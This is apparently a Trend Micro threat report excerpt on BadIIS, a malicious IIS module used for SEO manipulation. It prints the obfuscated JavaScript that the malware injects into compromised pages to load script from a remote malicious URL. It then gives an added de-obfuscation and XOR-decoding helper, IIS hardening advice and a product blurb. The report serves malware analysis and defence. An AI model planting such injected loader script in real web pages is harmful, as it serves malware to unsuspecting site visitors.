TrendMicro

Chinese-Speaking Group Manipulates SEO with BadIIS

The following obfuscated code is used for injection:

<script type="text/javascript"> eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|{js}|split'.split('|'), 0, {})) </script>

The C&C URL is encrypted with a single-byte XOR key, 0x03, and decrypted at runtime. The decoded code is shown below:

document.write('<script type="text/javascript" src="{malicious URL}"></script>')
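As an added analysis helper (not code from the Trend Micro report or the BadIIS authors), the following JavaScript recovers the source hidden by the eval(function(p,a,c,k,e,r){...}) packer used in the injected script above without ever calling eval, and strips a single-byte XOR layer such as the 0x03 key described for the C&C URL; the packed sample, the XOR bytes and the hxxp://example.invalid URL are constructed placeholders, not indicators from the report.

```javascript
// Re-implements the packer's index encoder: dictionary index -> base-`a` token.
function encodeIndex(n, a) {
  const head = n < a ? '' : encodeIndex(Math.floor(n / a), a);
  const digit = n % a;
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Rebuilds the original source: every \w+ token that is a packer index is
// replaced by its dictionary word; tokens with an empty entry stay as-is.
// This is a pure string transform, so nothing from the sample is executed.
function unpack(p, a, c, k) {
  const dict = new Map();
  for (let i = 0; i < c; i++) {
    if (k[i]) dict.set(encodeIndex(i, a), k[i]);
  }
  return p.replace(/\b\w+\b/g, (w) => (dict.has(w) ? dict.get(w) : w));
}

// Single-byte XOR decoding of a byte array (the report names key 0x03).
function xorDecode(bytes, key) {
  return String.fromCharCode(...bytes.map((b) => b ^ key));
}

// When the key is unknown, try all 256 and return the first that yields a
// printable string starting with http:// or https://, or -1 if none does.
function guessXorKey(bytes) {
  for (let key = 0; key < 256; key++) {
    const text = xorDecode(bytes, key);
    if (/^https?:\/\//.test(text) && /^[\x20-\x7e]*$/.test(text)) return key;
  }
  return -1;
}

// Constructed sample in the same argument shape as the page's packer call
// (p, a, c, k). The URL is a placeholder, not an indicator from the report.
const SAMPLE_P = '1["2"]["3"](\'<0 4="5/6" 7="8"></0>\');';
const SAMPLE_K = 'script|window|document|write|type|text|javascript|src|hxxp://example.invalid/x.js'.split('|');

function decodeSample() {
  return unpack(SAMPLE_P, 36, SAMPLE_K.length, SAMPLE_K);
}

// Constructed bytes: the string "http://" XORed with 0x03.
const SAMPLE_XOR = [0x6b, 0x77, 0x77, 0x73, 0x39, 0x2c, 0x2c];
```

decodeSample() yields the window["document"]["write"](...) call with the script tag and URL in clear, and guessXorKey(SAMPLE_XOR) recovers 3 (0x03), so the same two steps can be applied to a captured sample before any indicator is written into a detection rule.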

Conclusion and the importance of IIS security

IIS is one of the services widely adopted by many organizations, and its misuse can lead to serious consequences. Attackers can exploit IIS vulnerabilities to serve malicious content to legitimate visitors of compromised websites. During recent campaigns, new variants were primarily used to deliver content related to online gambling. This approach can be easily adapted for mass malware distribution and watering hole attacks that target specific groups.

Site owners therefore face significant risks, including damage to their reputation, potential legal consequences and loss of user trust, all stemming from poorly secured web servers. To mitigate these risks, IT managers should implement the following best practices:

  • Identify assets that may be exposed to attackers and check them regularly for the latest security patches.
  • Monitor for abnormal IIS module installations, paying particular attention to module images located in uncommon directories.
  • Restrict administrative access to IIS servers and enforce strong, unique passwords with multi-factor authentication (MFA) for all privileged accounts.
  • Use firewalls to control and monitor network traffic to and from IIS servers, limiting exposure to potential threats.
  • Continuously monitor IIS server logs to detect anomalies such as unusual module installations or unexpected changes in server behavior.
  • Secure configurations by disabling unnecessary services and features, which minimizes the attack surface and strengthens overall server security.

Trend Vision One™

Trend Vision One™ is an enterprise cybersecurity platform that simplifies security and helps enterprises detect and stop threats faster by consolidating multiple security capabilities, enabling greater command of the enterprise’s attack surface, and providing complete visibility into its cyber risk posture. The cloud-based platform leverages AI and threat intelligence from 250 million sensors and 16 threat research centers around the globe to provide comprehensive risk insights, earlier threat detection, and automated risk and threat response options in a single solution.
